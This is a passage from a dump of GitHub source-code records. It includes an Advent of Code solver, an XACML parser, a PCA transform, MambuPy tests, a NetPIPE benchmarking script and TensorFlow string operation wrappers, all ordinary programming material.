list = [0]*100000\n mask = \"\"\n for line in lines:\n if line.startswith(\"mask =\"):\n mask = 
line.split(\" \")[2].strip()\n continue\n splitted = line.split(\" \")\n index = int(splitted[0][4:][:-1])\n number = \"{0:b}\".format(int(splitted[2]))\n number = \"0\"*(36 - len(number)) + number\n tmp = []\n for num in number:\n tmp.append(num)\n\n for i, num in enumerate(number):\n zeroes = False\n if mask[i] == \"X\":\n if zeroes:\n tmp[i] = 0\n continue\n else:\n tmp[i] = mask[i]\n zeroes = True\n number = \"\".join(tmp)\n mem[index] = number\n\n sum = 0\n for im in mem:\n if im != 0:\n sum += int(im, 2)\n\n print(f\"The sum is {sum}\")\n\n\nif __name__ == \"__main__\":\n calculate()\n","repo_name":"AutomatedTester/adventOfCode","sub_path":"2020/14/puzzle1.py","file_name":"puzzle1.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"71266928359","text":"\nimport string\nimport xml.sax\nfrom xml.sax.handler import *\n\nclass XacmlHandler(ContentHandler):\n \"\"\"Crude extractor for XACML document\"\"\"\n def __init__(self):\n self.isCallingNumber = 0\n self.isCalledNumber = 0\n self.isTransformedCgpn = 0\n self.isTransformedCdpn = 0\n self.CallingNumber = 0\n self.CalledNumber = 0\n self.TransformedCgpn = 0\n self.TransformedCdpn = 0\n \n def startDocument(self):\n print('--- Begin Document ---')\n \n def startElement(self, name, attrs):\n if name == 'Attribute':\n self.attrs = attrs.get('AttributeId')\n print('AttributeId', self.attrs)\n elif name == 'AttributeValue':\n if self.attrs == 'urn:Cisco:uc:1.0:callingnumber':\n self.isCallingNumber = 1\n elif self.attrs == 'urn:Cisco:uc:1.0:callednumber':\n self.isCalledNumber = 1\n elif self.attrs == 'urn:Cisco:uc:1.0:transformedcgpn':\n self.isTransformedCgpn = 1\n elif self.attrs == 'urn:Cisco:uc:1.0:transformedcdpn':\n self.isTransformedCdpn = 1\n \n def endElement(self, name):\n if name == 'Request':\n # format xacml response based on called/calling numbers\n print('endElement Request')\n \n def characters(self, ch):\n if self.isCallingNumber == 1:\n self.CallingNumber = ch\n print('CallingNumber ' + ch)\n self.isCallingNumber = 0\n if self.isCalledNumber == 1:\n self.CalledNumber = ch\n print('CalledNubmer ' + ch)\n self.isCalledNumber = 0\n if self.isTransformedCgpn == 1:\n self.TransformedCgpn = ch\n print('TransformedCgpn ' + ch)\n self.isTransformedCgpn = 0\n if self.isTransformedCdpn == 1:\n self.TransformedCdpn = ch\n print('TransformedCdpn ' + ch)\n self.isTransformedCdpn = 0\n\n def callingNumber(self): return self.CallingNumber\n\n def calledNumber(self): return self.CalledNumber\n\n def transformedCgpn(self): return self.TransformedCgpn\n\n def transformedCdpn(self): return self.TransformedCdpn\n\nif __name__ == '__main__':\n parser = xml.sax.make_parser()\n handler = XacmlHandler()\n parser.setContentHandler(handler)\n parser.parse(\"sampleXacmlReq.xml\")\n","repo_name":"gve-sw/Route-CUCM-calls-by-O365-calendar-with-CURRI","sub_path":"saxXacmlHandler.py","file_name":"saxXacmlHandler.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"} +{"seq_id":"72031158121","text":"from . 
import TransformException, BaseTransform\n\nimport numpy as np\nfrom sklearn.decomposition import PCA as sklearnPCA\n\nclass PCA(BaseTransform):\n \"\"\"\n Args:\n Raises:\n TransformException\n Returns:\n \"\"\"\n\n def __init__(\n self,\n num_components=75,\n source='raw',\n output='output',\n inplace=True):\n\n super().__init__(source, output, inplace)\n self.num_components = num_components\n\n def __call__(self, data):\n super().__call__(data)\n\n X, y = data[self.source]\n X = X.copy()\n y = y.copy()\n X = self._apply_pca(X)\n\n super().update(data, (X, y))\n\n\n def _apply_pca(self, X):\n \"\"\"\n Applies PCA to the input array X.\n :param X: A 3-dimensional numpy array of size (x, y, z) where x == y == z.\n :param numComponents: The number of components to keep.\n :return: A 3-dimensional numpy array of size (x, y, numComponents) and the PCA object itself.\n \"\"\"\n newX = np.reshape(X, (-1, X.shape[2]))\n pca = sklearnPCA(n_components=self.num_components, whiten=True)\n newX = pca.fit_transform(newX)\n newX = np.reshape(newX, (X.shape[0], X.shape[1], self.num_components))\n return newX","repo_name":"blainerothrock/hyperspectral-imaging-ml","sub_path":"hyperspec/transforms/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"70815014119","text":"print(\"Exponential Calculator \\n\"\n)\n\nprint(\"Please enter the range of numbers you would like to raise to an exponential power: \\n\")\n\ntry:\n value_1 = int(input(\"Number(Required): \"))\n\n input_value = input(\"Number(Optional): \")\n if (input_value == \"\"):\n value_2 = value_1\n else:\n value_2 = int(input_value)\n\n if value_1 > value_2:\n value_2 = value_1\n value_1 = int(input_value)\n\n print(\"\\nThanks! What exponent would you like to raise these numbers to? \\n\")\n\n exponent = int(input(\"Exponent(Required): \"))\n\n for i in range (value_1, value_2 + 1):\n print(\"No. {0:2} when raised to the power of {1:3} is {2:3}\".format(i, exponent, i**exponent))\n\nexcept:\n print(\"\\nError. 
Make sure that all values entered as integers and that all required values are filled in!\")\n","repo_name":"shreejalearn/PythonLearning","sub_path":"ExponentialCalc.py","file_name":"ExponentialCalc.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21461944763","text":"# coding: utf-8\n\nimport os\nimport sys\n\nsys.path.insert(0, os.path.abspath(\".\"))\n\ntry:\n import mock\nexcept ModuleNotFoundError:\n import unittest.mock as mock\n\nimport unittest\n\nfrom MambuPy import mambuconfig\n\nfor k, v in mambuconfig.default_configs.items():\n setattr(mambuconfig, k, v)\nfrom MambuPy.rest import mambuactivity\n\ntry:\n unittest.TestCase.assertRegexpMatches = unittest.TestCase.assertRegex # python3\nexcept Exception as e:\n pass # DeprecationWarning: Please use assertRegex instead\n\n\nclass MambuActivityTests(unittest.TestCase):\n def test_mod_urlfunc(self):\n from MambuPy.mambugeturl import getactivitiesurl\n\n self.assertEqual(mambuactivity.mod_urlfunc, getactivitiesurl)\n\n def test_class(self):\n a = mambuactivity.MambuActivity(urlfunc=None)\n self.assertTrue(mambuactivity.MambuStruct in a.__class__.__bases__)\n\n def test___init__(self):\n a = mambuactivity.MambuActivity(urlfunc=None, entid=\"anything\")\n self.assertEqual(a.entid, \"anything\")\n\n def test___repr__(self):\n from MambuPy.mambugeturl import getactivitiesurl\n\n def build_mock_act_1(self, *args, **kwargs):\n self.attrs = {\"activity\": args[1]}\n\n with mock.patch.object(mambuactivity.MambuStruct, \"__init__\", build_mock_act_1):\n a = mambuactivity.MambuActivity(\n urlfunc=getactivitiesurl, entid=\"mockactivity\"\n )\n self.assertRegexpMatches(\n repr(a), r\"^MambuActivity - activityid: mockactivity\"\n )\n\n\nclass MambuActivitiesTests(unittest.TestCase):\n def test_class(self):\n acs = mambuactivity.MambuActivities(urlfunc=None)\n self.assertTrue(mambuactivity.MambuStruct in acs.__class__.__bases__)\n\n def test_iterator(self):\n acs = mambuactivity.MambuActivities(urlfunc=None)\n acs.attrs = [{\"0\": 0}, {\"1\": 1}, {\"2\": 2}]\n self.assertEqual(len(acs), 3)\n for n, a in enumerate(acs):\n self.assertEqual(str(n), [k for k in a][0])\n self.assertEqual(n, a[str(n)])\n\n def test_convert_dict_to_attrs(self):\n from MambuPy.mambugeturl import getactivitiesurl\n\n acs = mambuactivity.MambuActivities(urlfunc=None)\n acs.attrs = [\n {\"activity\": \"my_act\"},\n {\"activity\": \"my_2_act\"},\n ]\n with self.assertRaisesRegexp(\n AttributeError,\n \"'MambuActivities' object has no attribute 'mambuactivityclass'\",\n ):\n acs.mambuactivityclass\n acs.convert_dict_to_attrs()\n self.assertEqual(\n str(acs.mambuactivityclass),\n \"\",\n )\n for a in acs:\n self.assertEqual(a.__class__.__name__, \"MambuActivity\")\n self.assertEqual(a._MambuStruct__urlfunc, getactivitiesurl)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"jstitch/MambuPy","sub_path":"tests/unit_mambuactivity.py","file_name":"unit_mambuactivity.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"13859531249","text":"import sys\ninput = sys.stdin.readline\n\nn = int(input())\nnumber_list = [-1]+list(map(int,input().split()))\ndp = [0 for _ in range(n+1)]\n\nfor i in range(1,n+1):\n temp = -1\n for j in range(i):\n if number_list[j]\\n\", p1.communicate()[0].strip())\n \ndef runRemoteCommandOut(server, com):\n p1 = Popen([\"ssh\", server, 
com], stdout=PIPE)\n print(\"\\tssh \"+server, com, \"->\\n\", p1.communicate()[0].strip())\n\ndef runRemoteCommandGet(server, com):\n p1 = Popen([\"ssh\", server, com], stdout=PIPE)\n return p1.communicate()[0].strip()\n \ndef runLocalCommand(com):\n p1 = Popen(list(filter(None, com.strip().split(' '))), stdout=PIPE)\n \ndef runRemoteCommand(server, com):\n p1 = Popen([\"ssh\", server, com], stdout=PIPE)\n\ndef updateITR(ITR):\n p1 = Popen([\"ssh\", CSERVER2, \"ethtool -C enp4s0f1 rx-usecs\", str(ITR)], stdout=PIPE, stderr=PIPE)\n p1.communicate()\n time.sleep(1)\n \ndef runBench(com):\n p1 = Popen(list(filter(None, com.strip().split(' '))), stdout=PIPE, stderr=PIPE)\n stdout, stderr = p1.communicate()\n if 'Mbps' in str(stderr):\n s = str(stderr).strip().split('-->')[1]\n t = s.split('Mbps')[0]\n return float(t.strip())\n else:\n return -1.0\n\ndef runStatic(msg_size):\n runRemoteCommand(CSERVER, \"taskset -c 1 NPtcp -l \"+msg_size+\" -u \"+msg_size+\" -p 0 -r -I\")\n time.sleep(1)\n tput = runBench(\"taskset -c 1 NPtcp -h \"+CSERVER+\" -l \"+msg_size+\" -u \"+msg_size+\" -T 2 -p 0 -r -I\")\n time.sleep(0.5)\n runRemoteCommand(CSERVER, \"pkill NPtcp\")\n time.sleep(0.5)\n runLocalCommand(\"pkill NPtcp\")\n time.sleep(0.5)\n return tput\n\nsock.send(\"hi\")\nitr = sock.recv()\nif int(itr) > 0 and int(itr) < 202:\n #itr = 40\n updateITR(itr)\n msg = 10000\n tput = runStatic(str(msg))\n #print(tput)\n sock.send(str(tput))\nelse:\n \n sock.send(str(abs(int(itr)) * -9999.99))\n","repo_name":"handong32/NicFuzzer","sub_path":"netpipe2.py","file_name":"netpipe2.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4005655134","text":"import numpy as np\n\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.framework import sparse_tensor\nfrom tensorflow.python.framework import tensor_util\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import gen_parsing_ops\nfrom tensorflow.python.ops import gen_string_ops\nfrom tensorflow.python.ops import math_ops\n\n# go/tf-wildcard-import\n# pylint: disable=wildcard-import\n# pylint: disable=g-bad-import-order\nfrom tensorflow.python.ops.gen_string_ops import *\nfrom tensorflow.python.util import compat as util_compat\nfrom tensorflow.python.util import deprecation\nfrom tensorflow.python.util import dispatch\nfrom tensorflow.python.util.tf_export import tf_export\n# pylint: enable=g-bad-import-order\n# pylint: enable=wildcard-import\n\n\n# pylint: disable=redefined-builtin\n@tf_export(\"strings.regex_full_match\")\n@dispatch.register_unary_elementwise_api\n@dispatch.add_dispatch_support\ndef regex_full_match(input, pattern, name=None):\n r\"\"\"Match elements of `input` with regex `pattern`.\n\n Args:\n input: string `Tensor`, the source strings to process.\n pattern: string or scalar string `Tensor`, regular expression to use,\n see more details at https://github.com/google/re2/wiki/Syntax\n name: Name of the op.\n\n Returns:\n bool `Tensor` of the same shape as `input` with match results.\n \"\"\"\n if isinstance(pattern, util_compat.bytes_or_text_types):\n # When `pattern` is static through the life of the op we can\n # use a version which performs the expensive regex compilation once at\n # creation time.\n return gen_string_ops.static_regex_full_match(\n input=input, pattern=pattern, name=name)\n return 
gen_string_ops.regex_full_match(\n      input=input, pattern=pattern, name=name)\n\nregex_full_match.__doc__ = gen_string_ops.regex_full_match.__doc__\n\n\n@tf_export(\n    \"strings.regex_replace\", v1=[\"strings.regex_replace\", \"regex_replace\"])\n@dispatch.register_unary_elementwise_api\n@dispatch.add_dispatch_support\n@deprecation.deprecated_endpoints(\"regex_replace\")\ndef regex_replace(input, pattern, rewrite, replace_global=True, name=None):\n  r\"\"\"Replace elements of \`input\` matching regex \`pattern\` with \`rewrite\`.\n\n  >>> tf.strings.regex_replace(\"Text with tags.<br /><b>
contains html</b>\",\n  ...                          \"<[^>]+>\", \" \")\n  <tf.Tensor: shape=(), dtype=string, numpy=b'Text with tags.  contains html '>\n\n  Args:\n    input: string \`Tensor\`, the source strings to process.\n    pattern: string or scalar string \`Tensor\`, regular expression to use,\n      see more details at https://github.com/google/re2/wiki/Syntax\n    rewrite: string or scalar string \`Tensor\`, value to use in match\n      replacement, supports backslash-escaped digits (\\1 to \\9), which can be\n      used to insert text matching the corresponding parenthesized group.\n    replace_global: \`bool\`, if \`True\` replace all non-overlapping matches,\n      else replace only the first match.\n    name: A name for the operation (optional).\n\n  Returns:\n    string \`Tensor\` of the same shape as \`input\` with specified replacements.\n  \"\"\"\n  if (isinstance(pattern, util_compat.bytes_or_text_types) and\n      isinstance(rewrite, util_compat.bytes_or_text_types)):\n    # When \`pattern\` and \`rewrite\` are static through the life of the op we can\n    # use a version which performs the expensive regex compilation once at\n    # creation time.\n    return gen_string_ops.static_regex_replace(\n        input=input, pattern=pattern,\n        rewrite=rewrite, replace_global=replace_global,\n        name=name)\n  return gen_string_ops.regex_replace(\n      input=input, pattern=pattern,\n      rewrite=rewrite, replace_global=replace_global,\n      name=name)\n\n\n@tf_export(\"strings.format\")\n@dispatch.add_dispatch_support\ndef string_format(template, inputs, placeholder=\"{}\", summarize=3, name=None):\n  r\"\"\"Formats a string template using a list of tensors.\n\n  Formats a string template using a list of tensors, abbreviating tensors by\n  only printing the first and last \`summarize\` elements of each dimension\n  (recursively). If formatting only one tensor into a template, the tensor does\n  not have to be wrapped in a list.\n\n  Example:\n    Formatting a single-tensor template:\n\n    >>> tensor = tf.range(5)\n    >>> tf.strings.format(\"tensor: {}, suffix\", tensor)\n    <tf.Tensor: shape=(), dtype=string, numpy=b'tensor: [0 1 2 3 4], suffix'>\n\n    Formatting a multi-tensor template:\n\n    >>> tensor_a = tf.range(2)\n    >>> tensor_b = tf.range(1, 4, 2)\n    >>> tf.strings.format(\"a: {}, b: {}, suffix\", (tensor_a, tensor_b))\n    <tf.Tensor: shape=(), dtype=string, numpy=b'a: [0 1], b: [1 3], suffix'>\n\n\n  Args:\n    template: A string template to format tensor values into.\n    inputs: A list of \`Tensor\` objects, or a single Tensor.\n      The list of tensors to format into the template string. If a solitary\n      tensor is passed in, the input tensor will automatically be wrapped as a\n      list.\n    placeholder: An optional \`string\`. Defaults to \`{}\`.\n      At each placeholder occurring in the template, a subsequent tensor\n      will be inserted.\n    summarize: An optional \`int\`. Defaults to \`3\`.\n      When formatting the tensors, show the first and last \`summarize\`\n      entries of each tensor dimension (recursively). If set to -1, all\n      elements of the tensor will be shown.\n    name: A name for the operation (optional).\n\n  Returns:\n    A scalar \`Tensor\` of type \`string\`.\n\n  Raises:\n    ValueError: if the number of placeholders does not match the number of\n      inputs.\n  \"\"\"\n  # If there is only one tensor to format, we will automatically wrap it in a\n  # list to simplify the user experience\n  if tensor_util.is_tf_type(inputs):\n    inputs = [inputs]\n  if template.count(placeholder) != len(inputs):\n    raise ValueError(f\"The template expects {template.count(placeholder)} \"\n                     f\"tensors, but the inputs only has {len(inputs)}. 
\"\n \"Please ensure the number of placeholders in template \"\n \"matches inputs length.\")\n\n return gen_string_ops.string_format(inputs,\n template=template,\n placeholder=placeholder,\n summarize=summarize,\n name=name)\n\n\n# Note: tf.strings.split is exported in ragged/ragged_string_ops.py, which\n# defines a wrapper for this function.\ndef string_split(source, sep=None, skip_empty=True, delimiter=None): # pylint: disable=invalid-name\n \"\"\"Split elements of `source` based on `delimiter` into a `SparseTensor`.\n\n Let N be the size of source (typically N will be the batch size). Split each\n element of `source` based on `delimiter` and return a `SparseTensor`\n containing the split tokens. Empty tokens are ignored.\n\n If `sep` is an empty string, each element of the `source` is split\n into individual strings, each containing one byte. (This includes splitting\n multibyte sequences of UTF-8.) If delimiter contains multiple bytes, it is\n treated as a set of delimiters with each considered a potential split point.\n\n For example:\n N = 2, source[0] is 'hello world' and source[1] is 'a b c', then the output\n will be\n\n st.indices = [0, 0;\n 0, 1;\n 1, 0;\n 1, 1;\n 1, 2]\n st.shape = [2, 3]\n st.values = ['hello', 'world', 'a', 'b', 'c']\n\n Args:\n source: `1-D` string `Tensor`, the strings to split.\n sep: `0-D` string `Tensor`, the delimiter character, the string should\n be length 0 or 1. Default is ' '.\n skip_empty: A `bool`. If `True`, skip the empty strings from the result.\n delimiter: deprecated alias for `sep`.\n\n Raises:\n ValueError: If delimiter is not a string.\n\n Returns:\n A `SparseTensor` of rank `2`, the strings split according to the delimiter.\n The first column of the indices corresponds to the row in `source` and the\n second column corresponds to the index of the split component in this row.\n \"\"\"\n delimiter = deprecation.deprecated_argument_lookup(\n \"sep\", sep, \"delimiter\", delimiter)\n\n if delimiter is None:\n delimiter = \" \"\n delimiter = ops.convert_to_tensor(delimiter, dtype=dtypes.string)\n source = ops.convert_to_tensor(source, dtype=dtypes.string)\n\n indices, values, shape = gen_string_ops.string_split(\n source, delimiter=delimiter, skip_empty=skip_empty)\n indices.set_shape([None, 2])\n values.set_shape([None])\n shape.set_shape([2])\n return sparse_tensor.SparseTensor(indices, values, shape)\n\n\n# Note: tf.strings.split is exported in ragged/ragged_string_ops.py, which\n# defines a wrapper for this function.\ndef string_split_v2(source, sep=None, maxsplit=-1):\n \"\"\"Split elements of `source` based on `sep` into a `SparseTensor`.\n\n Let N be the size of source (typically N will be the batch size). Split each\n element of `source` based on `sep` and return a `SparseTensor`\n containing the split tokens. Empty tokens are ignored.\n\n For example, N = 2, source[0] is 'hello world' and source[1] is 'a b c',\n then the output will be\n\n st.indices = [0, 0;\n 0, 1;\n 1, 0;\n 1, 1;\n 1, 2]\n st.shape = [2, 3]\n st.values = ['hello', 'world', 'a', 'b', 'c']\n\n If `sep` is given, consecutive delimiters are not grouped together and are\n deemed to delimit empty strings. For example, source of `\"1<>2<><>3\"` and\n sep of `\"<>\"` returns `[\"1\", \"2\", \"\", \"3\"]`. 
If `sep` is None or an empty\n string, consecutive whitespace are regarded as a single separator, and the\n result will contain no empty strings at the start or end if the string has\n leading or trailing whitespace.\n\n Note that the above mentioned behavior matches python's str.split.\n\n Args:\n source: `1-D` string `Tensor`, the strings to split.\n sep: `0-D` string `Tensor`, the delimiter character.\n maxsplit: An `int`. If `maxsplit > 0`, limit of the split of the result.\n\n Raises:\n ValueError: If sep is not a string.\n\n Returns:\n A `SparseTensor` of rank `2`, the strings split according to the delimiter.\n The first column of the indices corresponds to the row in `source` and the\n second column corresponds to the index of the split component in this row.\n \"\"\"\n if sep is None:\n sep = \"\"\n sep = ops.convert_to_tensor(sep, dtype=dtypes.string)\n source = ops.convert_to_tensor(source, dtype=dtypes.string)\n\n indices, values, shape = gen_string_ops.string_split_v2(\n source, sep=sep, maxsplit=maxsplit)\n indices.set_shape([None, 2])\n values.set_shape([None])\n shape.set_shape([2])\n return sparse_tensor.SparseTensor(indices, values, shape)\n\n\ndef _reduce_join_reduction_dims(x, axis):\n \"\"\"Returns range(rank(x) - 1, 0, -1) if axis is None; or axis otherwise.\"\"\"\n if axis is not None:\n return axis\n else:\n # Fast path: avoid creating Rank and Range ops if ndims is known.\n if x.get_shape().ndims is not None:\n return constant_op.constant(\n np.arange(x.get_shape().ndims - 1, -1, -1), dtype=dtypes.int32)\n\n # Otherwise, we rely on Range and Rank to do the right thing at run-time.\n return math_ops.range(array_ops.rank(x) - 1, -1, -1)\n\n\n@tf_export(v1=[\"strings.reduce_join\", \"reduce_join\"])\n@dispatch.add_dispatch_support\n@deprecation.deprecated_args(None,\n \"keep_dims is deprecated, use keepdims instead\",\n \"keep_dims\")\n@deprecation.deprecated_endpoints(\"reduce_join\")\ndef reduce_join(inputs, axis=None, # pylint: disable=missing-docstring\n keep_dims=None,\n separator=\"\",\n name=None,\n reduction_indices=None,\n keepdims=None):\n keepdims = deprecation.deprecated_argument_lookup(\"keepdims\", keepdims,\n \"keep_dims\", keep_dims)\n if keep_dims is None:\n keep_dims = False\n axis = deprecation.deprecated_argument_lookup(\"axis\", axis,\n \"reduction_indices\",\n reduction_indices)\n return reduce_join_v2(\n inputs=inputs,\n axis=axis,\n keepdims=keepdims,\n separator=separator,\n name=name)\n\n\n@tf_export(\"strings.reduce_join\", v1=[])\n@dispatch.add_dispatch_support\ndef reduce_join_v2( # pylint: disable=missing-docstring\n inputs,\n axis=None,\n keepdims=False,\n separator=\"\",\n name=None):\n \"\"\"Joins all strings into a single string, or joins along an axis.\n\n This is the reduction operation for the elementwise `tf.strings.join` op.\n\n >>> tf.strings.reduce_join([['abc','123'],\n ... ['def','456']]).numpy()\n b'abc123def456'\n >>> tf.strings.reduce_join([['abc','123'],\n ... ['def','456']], axis=-1).numpy()\n array([b'abc123', b'def456'], dtype=object)\n >>> tf.strings.reduce_join([['abc','123'],\n ... ['def','456']],\n ... axis=-1,\n ... separator=\" \").numpy()\n array([b'abc 123', b'def 456'], dtype=object)\n\n Args:\n inputs: A `tf.string` tensor.\n axis: Which axis to join along. 
The default behavior is to join all\n elements, producing a scalar.\n keepdims: If true, retains reduced dimensions with length 1.\n separator: a string added between each string being joined.\n name: A name for the operation (optional).\n\n Returns:\n A `tf.string` tensor.\n \"\"\"\n with ops.name_scope(None, \"ReduceJoin\", [inputs, axis]):\n inputs_t = ops.convert_to_tensor(inputs)\n axis = _reduce_join_reduction_dims(inputs_t, axis)\n return gen_string_ops.reduce_join(\n inputs=inputs_t,\n reduction_indices=axis,\n keep_dims=keepdims,\n separator=separator,\n name=name)\n\nreduce_join.__doc__ = reduce_join_v2.__doc__\n\n\n# This wrapper provides backwards compatibility for code that predates the\n# unit argument and that passed 'name' as a positional argument.\n@tf_export(v1=[\"strings.length\"])\n@dispatch.register_unary_elementwise_api\n@dispatch.add_dispatch_support\ndef string_length(input, name=None, unit=\"BYTE\"):\n \"\"\"Computes the length of each string given in the input tensor.\n\n >>> strings = tf.constant(['Hello','TensorFlow', '🙂'])\n >>> tf.strings.length(strings).numpy() # default counts bytes\n array([ 5, 10, 4], dtype=int32)\n >>> tf.strings.length(strings, unit=\"UTF8_CHAR\").numpy()\n array([ 5, 10, 1], dtype=int32)\n\n Args:\n input: A `Tensor` of type `string`. The strings for which to compute the\n length for each element.\n name: A name for the operation (optional).\n unit: An optional `string` from: `\"BYTE\", \"UTF8_CHAR\"`. Defaults to\n `\"BYTE\"`. The unit that is counted to compute string length. One of:\n `\"BYTE\"` (for the number of bytes in each string) or `\"UTF8_CHAR\"` (for\n the number of UTF-8 encoded Unicode code points in each string). Results\n are undefined if `unit=UTF8_CHAR` and the `input` strings do not contain\n structurally valid UTF-8.\n\n Returns:\n A `Tensor` of type `int32`, containing the length of the input string in\n the same element of the input tensor.\n \"\"\"\n return gen_string_ops.string_length(input, unit=unit, name=name)\n\n\n@tf_export(\"strings.length\", v1=[])\n@dispatch.register_unary_elementwise_api\n@dispatch.add_dispatch_support\ndef string_length_v2(input, unit=\"BYTE\", name=None):\n return gen_string_ops.string_length(input, unit=unit, name=name)\n\n\nstring_length_v2.__doc__ = gen_string_ops.string_length.__doc__\n\n\n@tf_export(v1=[\"substr\"])\n@dispatch.register_unary_elementwise_api\n@dispatch.add_dispatch_support\n@deprecation.deprecated(None, \"Use `tf.strings.substr` instead of `tf.substr`.\")\ndef substr_deprecated(input, pos, len, name=None, unit=\"BYTE\"):\n return substr(input, pos, len, name=name, unit=unit)\n\nsubstr_deprecated.__doc__ = gen_string_ops.substr.__doc__\n\n\n@tf_export(v1=[\"strings.substr\"])\n@dispatch.register_unary_elementwise_api\n@dispatch.add_dispatch_support\ndef substr(input, pos, len, name=None, unit=\"BYTE\"):\n return gen_string_ops.substr(input, pos, len, unit=unit, name=name)\n\nsubstr.__doc__ = gen_string_ops.substr.__doc__\n\n\n@tf_export(\"strings.substr\", v1=[])\n@dispatch.register_unary_elementwise_api\n@dispatch.add_dispatch_support\ndef substr_v2(input, pos, len, unit=\"BYTE\", name=None):\n return gen_string_ops.substr(input, pos, len, unit=unit, name=name)\n\nsubstr_v2.__doc__ = 
gen_string_ops.substr.__doc__\n\n\nops.NotDifferentiable(\"RegexReplace\")\nops.NotDifferentiable(\"StringToHashBucket\")\nops.NotDifferentiable(\"StringToHashBucketFast\")\nops.NotDifferentiable(\"StringToHashBucketStrong\")\nops.NotDifferentiable(\"ReduceJoin\")\nops.NotDifferentiable(\"StringJoin\")\nops.NotDifferentiable(\"StringSplit\")\nops.NotDifferentiable(\"AsString\")\nops.NotDifferentiable(\"EncodeBase64\")\nops.NotDifferentiable(\"DecodeBase64\")\n\n\n@tf_export(\"strings.to_number\", v1=[])\n@dispatch.register_unary_elementwise_api\n@dispatch.add_dispatch_support\ndef string_to_number(input, out_type=dtypes.float32, name=None):\n  r\"\"\"Converts each string in the input Tensor to the specified numeric type.\n\n  (Note that int32 overflow results in an error while float overflow\n  results in a rounded value.)\n\n  Examples:\n\n  >>> tf.strings.to_number(\"1.55\")\n  <tf.Tensor: shape=(), dtype=float32, numpy=1.55>\n  >>> tf.strings.to_number(\"3\", tf.int32)\n  <tf.Tensor: shape=(), dtype=int32, numpy=3>\n\n  Args:\n    input: A \`Tensor\` of type \`string\`.\n    out_type: An optional \`tf.DType\` from: \`tf.float32, tf.float64, tf.int32,\n      tf.int64\`. Defaults to \`tf.float32\`.\n      The numeric type to interpret each string in \`string_tensor\` as.\n    name: A name for the operation (optional).\n\n  Returns:\n    A \`Tensor\` of type \`out_type\`.\n  \"\"\"\n  return gen_parsing_ops.string_to_number(input, out_type, name)\n\n\n@tf_export(v1=[\"strings.to_number\", \"string_to_number\"])\n@dispatch.add_dispatch_support\ndef string_to_number_v1(\n    string_tensor=None,\n    out_type=dtypes.float32,\n    name=None,\n    input=None):\n  string_tensor = deprecation.deprecated_argument_lookup(\n      \"input\", input, \"string_tensor\", string_tensor)\n  return gen_parsing_ops.string_to_number(string_tensor, out_type, name)\n\nstring_to_number_v1.__doc__ = gen_parsing_ops.string_to_number.__doc__\n\n\n@tf_export(\"strings.to_hash_bucket\", v1=[])\n@dispatch.register_unary_elementwise_api\n@dispatch.add_dispatch_support\ndef string_to_hash_bucket(input, num_buckets, name=None):\n  # pylint: disable=line-too-long\n  r\"\"\"Converts each string in the input Tensor to its hash mod by a number of buckets.\n\n  The hash function is deterministic on the content of the string within the\n  process.\n\n  Note that the hash function may change from time to time.\n  This functionality will be deprecated and it's recommended to use\n  \`tf.strings.to_hash_bucket_fast()\` or \`tf.strings.to_hash_bucket_strong()\`.\n\n  Examples:\n\n  >>> tf.strings.to_hash_bucket([\"Hello\", \"TensorFlow\", \"2.x\"], 3)\n  <tf.Tensor: shape=(3,), dtype=int64, numpy=array([2, 0, 1])>\n\n  Args:\n    input: A \`Tensor\` of type \`string\`.\n    num_buckets: An \`int\` that is \`>= 1\`. 
The number of buckets.\n name: A name for the operation (optional).\n\n Returns:\n A `Tensor` of type `int64`.\n \"\"\"\n # pylint: enable=line-too-long\n return gen_string_ops.string_to_hash_bucket(input, num_buckets, name)\n\n\n@tf_export(v1=[\"strings.to_hash_bucket\", \"string_to_hash_bucket\"])\n@dispatch.register_unary_elementwise_api\n@dispatch.add_dispatch_support\ndef string_to_hash_bucket_v1( # pylint: disable=missing-function-docstring\n string_tensor=None,\n num_buckets=None,\n name=None,\n input=None):\n string_tensor = deprecation.deprecated_argument_lookup(\n \"input\", input, \"string_tensor\", string_tensor)\n return gen_string_ops.string_to_hash_bucket(string_tensor, num_buckets, name)\n\nstring_to_hash_bucket_v1.__doc__ = gen_string_ops.string_to_hash_bucket.__doc__\n\n\n@tf_export(\"strings.join\", v1=[\"strings.join\", \"string_join\"])\n@dispatch.add_dispatch_support\n@deprecation.deprecated_endpoints(\"string_join\")\ndef string_join(inputs, separator=\"\", name=None):\n \"\"\"Perform element-wise concatenation of a list of string tensors.\n\n Given a list of string tensors of same shape, performs element-wise\n concatenation of the strings of the same index in all tensors.\n\n\n >>> tf.strings.join(['abc','def']).numpy()\n b'abcdef'\n >>> tf.strings.join([['abc','123'],\n ... ['def','456'],\n ... ['ghi','789']]).numpy()\n array([b'abcdefghi', b'123456789'], dtype=object)\n >>> tf.strings.join([['abc','123'],\n ... ['def','456']],\n ... separator=\" \").numpy()\n array([b'abc def', b'123 456'], dtype=object)\n\n The reduction version of this elementwise operation is\n `tf.strings.reduce_join`\n\n Args:\n inputs: A list of `tf.Tensor` objects of same size and `tf.string` dtype.\n separator: A string added between each string being joined.\n name: A name for the operation (optional).\n\n Returns:\n A `tf.string` tensor.\n \"\"\"\n return gen_string_ops.string_join(inputs, separator=separator, name=name)\n\n\n@tf_export(\"strings.unsorted_segment_join\")\n@dispatch.add_dispatch_support\ndef unsorted_segment_join(inputs,\n segment_ids,\n num_segments,\n separator=\"\",\n name=None):\n \"\"\"Joins the elements of `inputs` based on `segment_ids`.\n\n Computes the string join along segments of a tensor.\n\n Given `segment_ids` with rank 